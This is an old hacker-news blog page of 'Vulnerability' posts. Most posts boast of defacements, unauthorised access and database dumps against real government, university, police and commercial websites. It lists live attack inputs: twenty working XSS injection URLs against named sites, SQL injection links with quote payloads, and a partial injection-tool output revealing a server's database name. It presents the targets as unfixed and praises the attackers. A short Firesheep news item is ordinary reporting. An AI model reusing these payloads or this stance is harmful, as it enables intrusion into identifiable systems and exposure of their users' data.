english-inmind.com Hacked by aK47 and D4RK CRYST4L

Website english.inmind.com is hacked by Indian Hackers :- aK47 and D4RK

On Page SEO Optimization Techniques for Blogs/Beginners/Blogger

On Page SEO optimization is a technique to bring your site on to the top pages of search engines so If you want to do SEO for blogs then you can't be ignore on page seo optimization.

What is Denial of Service (DoS) Attacks

Denial Of Service (DoS) Attacks :- A denial of service (DoS) attack is an attack that clogs up so much memory on the target system that it can not serve it’s users, or it causes the target system to crash, reboot, or otherwise deny services to legitimate users.

26 Books on Hacking by Ankit Fadia: Free Downloads

Download various books on Hacking by Ankit Fadia for free Collection

Showing posts with label Vulnerability. Show all posts
Showing posts with label Vulnerability. Show all posts

Wednesday, September 14

BarackObama Website Service - Persistent Web Vulnerability

A persistent high priority Input Validation vulnerability is detected on BaraObamas official website service. Attacker can form malicious requests which pass through the backend (not parsed!) & can be displayed as outgoing info@barakobama.com mail. Attackers can steal backend sessions of the portal users/admins & can send malicious mails by the original postbox.
Vulnerability-Lab Team discovered persistent Web Vulnerability on BaraObamas official website service.
Disclaimer:
=======
The information provided in this advisory is provided as it is without any warranty. Vulnerability-Lab disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability- Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability- Lab. Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by Vulnerability-Lab or its suppliers.
Status :fixed 

XSS Vulnerability On KASKUS.US | Indonesian Largest Community

Indonesian Largest Community website kaskus.us Xss Vulnerability found by Cyber4rt . 416,238,482 posts and 3,422,101 Members in this website . You can see the vulnerable link Here .  
Status: Unfixed

Tuesday, September 13

Iframe Vulnerability on bloggertheme.net Found

Minhal Mehdi [ INDIAN HACKER] found a Iframe vulnerability on http://bloggertheme.net website. Hackers can use this vulnerability for exploit users through remote code injection.You can see the vulnerable Link of bloggertheme website.
Status : Unfixed

Sunday, September 11

XSS Attack On POLICE.UK Website by CYBER4RT



Police.uk Website Cross Site Scripting (XSS) Vulnerable. CYBER4RT Found This Vulnerability on Uk Police Website .You Can see Vulnerable Link Here .

Saturday, September 10

Nasa Government Server Unauthorised Access by @SwichSmoke



mandalay.arc.nasa.gov Website Server Unauthorised Access by @SwichSmoke. Access Proof of Nasa Website is Here .

Google Web History vulnerable to new Firesheep Addon

Two researchers have shown how a modded version of the Firesheep Wi-Fi sniffing tool can be used to access most of a victim’s Google Web History, a record of everything an individual has searched for.

The core weakness discovered by the proof-of-concept attack devised by Vincent Toubiana and Vincent Verdot lies with what is called a Session ID (SID) cookie, used to identify a user to each service they access while logged in to one of Google’s services.Fortunately, the latest exploit does not allow attackers to take over Google Accounts, but obviously, it can be used to expose private data. "While the direct access to users' data is subject to a strict security policy, using personalized services (which may leak this same personal information) is not," wrote Vincent Toubiana and Vincent Verdot, the creators of the modded Firesheep.

To be sure, the compromised cookies are deployed across more than 20 websites including Google Search, Google Maps, YouTube and Blogger. Every time the user accesses an application, the same SID cookie is sent in the clear, which the Firesheep captures from the data sent to and from a PC connected to a non-encrypted public Wi-Fi hotspot.A Google spokesman sent a statement :
We consider the concerns raised by these researchers to be fairly academic in nature and not a significant risk to users. Google Web History and our Web Search suggestion service are served over HTTPS, and we have encrypted the back-end server requests associated with the suggestion service as well. We look forward to providing more support for SSL technologies across our product offerings in the future, including changes that will specifically protect hijacked cookies from being used to access search data.
The researchers said users can protect themselves by logging out of their Google accounts while connecting over networks they don't trust. Another countermeasure is to disable Google's “visited” and “social” search filters.

Friday, September 9

Office of President Nepal Website hacked and Database compromise by TEAM T!g3R



Office of President Nepal Website hacked and Database compromise by TEAM T!g3R .Compromise Database expose here .
Vulnerable Website : http://eproc.presidentofnepal.gov.np

Xss Vulnerabillity found in Amity university website by Mafia_boy [Team Hindustan Cyber Force]


Mafia_boy Team Hindustan Cyber Force found XSS vulnerabillity in Amity University website.
About Amit University  :
Amity University (Hindi : एमिटी विश्वविद्यालय) is a private university in Noida, India established under an Uttar Pradesh state government act.
The founder president is Ashok Chauhan. It is not approved by the All India Council for Technical Education (AICTE). As per the university, it is not required to take the approval of AICTE.[1] The university has been involved in controversies, including refusal by the Universities Grants Commission (UGC) to recognize Amity University and an international arrest warrant against its founder president Ashok Chauhan.
Status:-unfixed

SQLi Vulnerability in maistempo website Found by Brazilian Joker

Brazilian Joker Found SQLi Vulnerability and Defaced maistempo website.
http://www.maistempo.com.pt/index.php

INDIAN News paper Dainikbhaskar website SQLi Vulnerability Found by H@ck3r h!t3sh [Team Hindustan Cyber Force ]



INDIAN Leading News Paper Website SQL Injection Vulnerable. H@ck3r h!t3sh [team Hindustan Cyber Force] Found this vulnerability and exposed database for world.
INDIAN Leading Team Hindustan Cyber Force on a mission "SAFE And SECURE INDIA ".
Vulnerable Server : http://epaper.bhaskar.com/mpcg/ [ the whole server is
vulnerable to sql injection ]
Database Disclose here

Thursday, September 8

Hizb-ul Mujahdeen official webite owned by Hmei7

Hizb-ul Mujahdeen official webite owned by Hmei7
Here is the Link of the Hacked website
http://www.hizbmedia.com/
This website is hacked by Hmei7
and here is its Vulnerable link :D 

http://www.hizbmedia.com/index.php?q=node&vid=1&nid=1524%27

Appin IT Security Company's Website Xss Vulnerability Found by Mr. F@LTu



Indian Leading IT security company Appin student portal now xss, buffer overflow and remote code execution Vulnerable. IT Professional  Mr. F@LTu found these Vulnerability in Leading IT Security Company. Company clam to give security most of Government and indian Business websites. 
Now it's time for get your own website secure and upgrade Student Portal Server. 
Message : No One is secure, try to make it complex.
Vulnerable website : http://www.appinstudent.com/studentcenter/login/index.php
Status: Not Fix Yet .
More hacks by Mr. F@ltu:
University of Rajasthan website SQLi Vulnerability Found by Mr. F@LTu
Networknuts Website SQLi Vulnerability Found by Mr. F@LTu
Chartered Accountant [ CA ] Website SQL Injection Vulnerability Found by Mr. F@LTu
Pakistan Science Foundation Government Website Hacked and Vulnerable Link disclose By Mr. F@LTu
Pakistan Quaid-i-azam University Website hacked and Database Exposed by Mr. F@LTu
Source--> News-H

Wednesday, September 7

20 Famous websites vulnerable to Cross Site Scripting (XSS) Attack



Most of the biggest and Famous sites are found to be Vulnerable to XSS attack . Cross-site scripting (XSS) is a type of computer security vulnerability typically found in web applications which allow code injection by malicious web users into the web pages viewed by other users. Examples of such code include HTML code and client-side scripts. An exploited cross-site scripting vulnerability can be used by attackers to bypass access controls such as the same origin policy. Recently, vulnerabilities of this kind have been exploited to craft powerful phishing attacks and browser exploits. Cross-site scripting was originally referred to as CSS, although this usage has been largely discontinued.

Hacker with code name "Invectus" list some such famous sites with XSS vulnerability as listed below :1.) http://video.state.gov/en/search/img-srchttp-i55tinypiccom-witu7dpng-height650-width1000/Ij48aW1nIHNyYz0iaHR0cDovL2k1NS50aW55cGljLmNvbS93aXR1N2QucG5nIiBoZWlnaHQ9IjY1MCIgd2lkdGg9IjEwMDAiPg%3D%3D

2.) http://www.telegraph.co.uk/search/?queryText=%22%3E%3Cimg%20src=%22http://i55.tinypic.com/witu7d.png%22%20height=%22650%22%20width=%221000%22%3E

3.) http://www.dsm.com/en_US/cworld/public/home/pages/searchResults.jsp?search-site=%22%3E%3Cimg+src%3D%22http%3A%2F%2Fi55.tinypic.com%2Fwitu7d.png%22+height%3D%22650%22+width%3D%221000%22%3E&noMimimumKeywords=false

4.) http://www.schools.nsw.edu.au/psearch/ext/?refine=new&QueryText=%22%3E%3Cimg+src%3D%22http%3A%2F%2Fi55.tinypic.com%2Fwitu7d.png%22+height%3D%22650%22+width%3D%221000%22%3E&Go.x=29&Go.y=25&Go=submit

5.) http://thetablet.co.uk/search.php?q=%22%3E%3Cimg%20src=%22http://i55.tinypic.com/witu7d.png%22%20height=%22650%22%20width=%221000%22%3E

6.) http://www.scstatehouse.gov/cgi-bin/query.exe?first=FIRST&querytext=&category=%22%3E%3Cimg%20src=%22http://i55.tinypic.com/witu7d.png%22%20height=%22650%22%20width=%221000%22%3E

7.) http://www.highered.tafensw.edu.au/vsearch/tafehigheredu/?QueryText=%22%3E%3Cimg%20src=%22http://i55.tinypic.com/witu7d.png%22%20height=%22650%22%20width=%221000%22%3E

8.) http://www.mcdonalds.com/content/us/en/search/search_results.html?queryText=%22%3E%3Cimg%20src=%22http://i55.tinypic.com/witu7d.png%22%20height=%22650%22%20width=%221000%22%3E

9.) http://www.watersportholland.nl/cgi-bin/watersportholland/zoeken.cgi?search=Vera&query=%22%3E%3Cimg+src%3D%22http%3A%2F%2Fi55.tinypic.com%2Fwitu7d.png%22+height%3D%22650%22+width%3D%221000%22%3E

10.) http://www.gpo.gov/fdsys/search/searchresults.action?st=%22%3E%3Cimg%20src=%22http://i55.tinypic.com/witu7d.png%22%20height=%22650%22%20width=%221000%22%3E

11.) http://www.networkcomputing.com/sitesearch?sort=publishDate+desc&queryText=%22%3E%3Cimg+src%3D%22http%3A%2F%2Fi55.tinypic.com%2Fwitu7d.png%22+height%3D%22650%22+width%3D%221000%22%3E

12.) http://www.unc.edu/search/index.htm?q=%22%3E%3Cimg+src%3D%22http%3A%2F%2Fi55.tinypic.com%2Fwitu7d.png%22+height%3D%22650%22+width%3D%221000%22%3E&cx=014532668884084418890%3Ajyc_iub1byy&cof=FORID%3A10&ie=UTF-8&hq=inurl%3Adevnet.unc.edu

13.) http://cugir.mannlib.cornell.edu/search?querytext=%22%3E%3Cimg%20src=%22http://i55.tinypic.com/witu7d.png%22%20height=%22650%22%20width=%221000%22%3E

14.) http://ieeexplore.ieee.org./search/freesearchresult.jsp?newsearch=true&queryText=.QT.%3E%3Cimg+src.EQ..QT.http%3A%2F%2Fi55.tinypic.com%2Fwitu7d.png.QT.+height.EQ..QT.650.QT.+width.EQ..QT.1000.QT.%3E&x=58&y=13

15.) http://vivo-vis.cns.iu.edu/vivo1/search?querytext=%22%3E%3Cimg+src%3D%22http%3A%2F%2Fi55.tinypic.com%2Fwitu7d.png%22+height%3D%22650%22+width%3D%221000%22%3E

16.) http://google.nyu.edu/search?site=NYUWeb_Main&client=NYUWeb_Main&output=xml_no_dtd&proxyreload=1&proxystylesheet=stern_frontend&sitesearch=www.stern.nyu.edu&q=%22%3E%3Cimg+src%3D%22http%3A%2F%2Fi55.tinypic.com%2Fwitu7d.png%22+height%3D%22650%22+width%3D%221000%22%3E&x=8&y=6

17.) http://ofa.fas.harvard.edu/cal/search.php?q=%22%3E%3Cimg%20src=%22http://i55.tinypic.com/witu7d.png%22%20height=%22650%22%20width=%221000%22%3E

18.) http://www.uidaho.edu/search?q=%22%3E%3Cscript%3EInvectus%3C/script%3E&cof=FORID:9&cref=http://www.uidaho.edu/search?xml=1&ticks=634508915004972966

19.) https://vivo.ufl.edu/search?flag1=1&querytext=%22%3E%3Cimg+src%3D%22http%3A%2F%2Fi55.tinypic.com%2Fwitu7d.png%22+height%3D%22650%22+width%3D%221000%22%3E

20.) http://energy.gov/search/site/%22%3E%3Cimg%20src%3D%22http%3A//i55.tinypic.com/witu7d.png%22%20height%3D%22650%22%20width%3D%221000%22%3E

Games.com XSS Vulnerability found by Cyber4rt




One of the Biggest site for Hasbro Games, Video Games & Online Games - Games.com having XSS Vulnerability as shown in screenshot and Discovered by "Acizninja DeadcOde" at Cyber4rt.

Monday, September 5

University of Rajasthan website SQLi Vulnerability Found by Mr. F@LTu



University of Rajasthan website SQL Injection Vulnerable. Security expert  Mr. F@LTu  Found a Serous Vulnerability Found on University of Rajasthan . 
Vulnerable Website :  http://uniraj.ac.in
Vulnerable Link : http://earxiv.uniraj.ac.in/result/index2.php?rid=3318

Pizza Hut India SQL Vulnerable and Database Disclosed by Dr. Infereno Team Hindustan Cyber Force





Pizza Hut India SQL Vulnerable and Database Disclosed by Dr. Infereno Team Hindustan Cyber Force.
Defaced Database here .

Xss Vulnerability found on Roadies Website by Banna 0n hunt Team Hindustan Cyber Force





Xss Vulnerability found on Roadies Website by Banna 0n hunt Team Hindustan Cyber Force .

Networknuts Website SQLi Vulnerability Found by Mr. F@LTu



Networknuts is provide many I.T. courses in India. Mr. F@LTu found SQL vulnerability in Networknuts website and access the database. Security Professional Mr. F@LTu  Never damage the database. yesterday Mr. F@LTu Found Vulnerability in Indian and Pakistan websites. you can see the latest defacements of Mr.F@LTu
Vulnerable Website : http://www.networknuts.net
Vulnerable Link : http://www.networknuts.net/news_deatils.php?n_news_id=130
Proof of Access :

Host IP:        216.97.226.210
Web Server:  Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 mod_fcgid/2.3.5
Powered-by: PHP/5.2.17
ð–1ð–Falseð–0ð–0ð–130 and %True_Expression%ð–netwo32_certificatð–MySQL >=5ð–0ð–1ð–Filter:ð–Start Row: 1ð–0ð–0ð–ð–'ð–ð–0ð–0ð–Trueð–0ð–32ð–ð–Accept: */*


DB Server: MySQL >=5
Current DB: netwo32_certificat

VSO.org Website SQL Injection Vulnerability found by Phsy @stramble





VSO.org Website SQL Injection Vulnerability found by Phsy
Vulnerable Site :   http://vso.org
vulnerable link:          http://www.vso.org/eventcatview.php?id='8+
Directory traversal:   http://vso.org/files/
email:   http://www.vso.org/mail/


Founder Twitter : http://twitter.com/@stramble

Chartered Accountant [ CA ] Website SQL Injection Vulnerability Found by Mr. F@LTu





The Institute of Chartered Accountants of India [ CA ] Website need Security Experts. Hidden SQL Injection Vulnerability found by Mr. F@LTu  on CA website.  
Vulnerable Website : http://www.icai.org
Proof of Vulnerability :

Related Posts Plugin for WordPress, Blogger...